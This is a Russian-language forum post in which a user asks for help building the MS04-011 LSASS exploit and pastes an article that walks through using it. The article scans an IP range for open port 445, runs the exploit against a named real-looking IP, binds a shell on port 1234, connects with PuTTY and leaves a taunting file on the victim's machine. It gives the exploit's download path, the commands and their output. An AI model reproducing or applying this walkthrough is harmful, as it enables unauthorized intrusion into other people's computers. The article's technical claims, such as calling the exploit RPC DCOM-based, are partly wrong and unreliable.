Очень интересная статья про использование эксплойта автор все описал в подробности но!!! не написал как
у него сделан эксплойт !!!!!!!
Вопрос может кто нить и настроить исходник так что бы он открывал порт 1234 когда когда отакуешь через
445 порт а то я где то скачал но не на сайте securitylab.ru файл ms04011lsass.rar он только открывает 445 когда
порт уже открыт вообщем пишет так !!!!!!!
пишу expl.exe to xxx.xxx.xxx.xxx и порт 1234 в строке выдаеться типа
дело в том что я не умею компилировать файлы ((((((
[*]Connecting to 213.247.202.182 445ok! а у автора статьи выдает порт 1234 вот в чем гвоздь
[*]Attackingok!
Прочитайте статью и помогите чем можно напешите на почту
[email protected] или на форуме плиз если
есть настроенный эксплойт дайте ссылку плиз!!! за ранее спасибо yhamobi
ссылка на эксплойт есть в статье там исходник!!!
А вот и сама статья
Автор:gemagla.b1n
Цель эксплоита: Remote DoS, Remote System
Воздействие эксплоита: Windows 2000 sp4, Windows XP sp1
Автор эксплоита: houseofdabus
Описание уязвимости:
www.securitylab.ru/44490.html
Скачать эксплоит:
www.securitylab.ru/_Exploits/2004/04/04252004.ms04011lsass.rar
В этой статье я буду на реальном примере возводить эксплоит и опишу основные моменты использования
уязвимости.
Lets begin.
Для начала нам нужно слить эксплоит.сливаем.в моем случае я закачивал сорсы(исходники) и
откомпилировал.
Также понадобится любой сканер, я буду использовать ][Spider 6.5.Для меня он является самм лучшим и
надежным.
Также обяателен любой telnet-клиент, я воспользовался SecureCRT.
Target.
Вот тут нам понадобится сканер Х-spider.С помощью его надо найти цель.Как известно, на машине должен быть
открыт 445 порт.Этим и надо воспользоваться.Я пользовался Х-spiderом.Он легкий, не требователен к
ресурсам, имеет удобный интерфейс, да еще и бесплатно.=)
Надо найти цеь… В меню Х-spiderа выбираем Поиск и указываем диапазон IP-адрессом и ставим условие на
открытый 445 порт.
Вот что показад мне сканер:
— 213.247.202.177
— 213.247.202.178
— 213.247.202.179
— 213.247.202.180
— 213.247.202.181
+ 213.247.202.182
— 213.247.202.183
Видите +? Значит это машина с открытым 445 портом! Цель найдена.Это был только первый шаг.
Lets attack!
После того, как цель найдена, приступаем к возведению сплоита.Вот как это надо 10делать
Для начала определим удаленную ОС.Делаем это так
Запускаем коммандную строку и задаем путь к сплоиту..
C:expl.exe
Смотрим на поле Targets.0-ОС ХР. Если мы зададим параметр t, то можно определить удаленную ОС
C:expl.exe 0 213.247.202.182 1234-t
Результат:
Target:IP: 213.247.202.182: OS:WinXP Professional [universal] lsass.exe
[*] connecting to 213.247.202.182 OK
[*] Detecting remote OS:Windows 5.1
Смотрим вверх.5.1.
Detect remote OS:
Windows 5.1-WinXp
Ось мы определили… ХР!
Далее прсто пишем
C:expl.exe 0 213.247.202.182 1234 (без префикса t)
[*]Connecting to 213.247.202.182 1234ok!
[*]Attackingok!
Вот мы и соверили атаку на машину..
Теперь биндим там порт(я выбрал 1234, как вы видите)
Опять пишем:
C:expl.exe 0 213.247.202.182 1234
Повторяется все тоже самое, но теперь я забиндил 1234 порт на компе цели.
Теперь коннектимся
Я запускаю PuTTy и на вкладке Session указыва АйПи машины, порт(1234) и коннектюсь по протоколу Raw.
Конектимсяи мы уже в машине Задача выполненано! Не зря же мы старались… Надо немнофка пофалить!
Я оставлюя командой echo привет на компе!
C:>echo прива! Ламер ушастый!gemagla.b1n and Bcteam have you >hello.txt(оставляю послание в файле hello.txt)
Вот и все! Я вскрыл машины, оставил сообщение =)
Что я могу сказать по этому поводу? Во-первых эксплоит, приминенный мною, основан на RPC dcom.Бага еще
до сих пор актуальна
www.microsoft.com/technet/security/...n/MS04-011.mspx -патч.
В этот раз мне повезлоатака прошла успешно! Но мог бы быть и такой вариант:
Причин этому может быть несколько:
— помешал запущенный Firewall;
— объект атаки оказался пропатчен;
— не подошла версия операционной системы;
— компьютер жертвы вышел из сети
4 комментария
Место для обсуждения этого вопроса действительно на форуме. Хорошо что хотя бы копирайты указаны.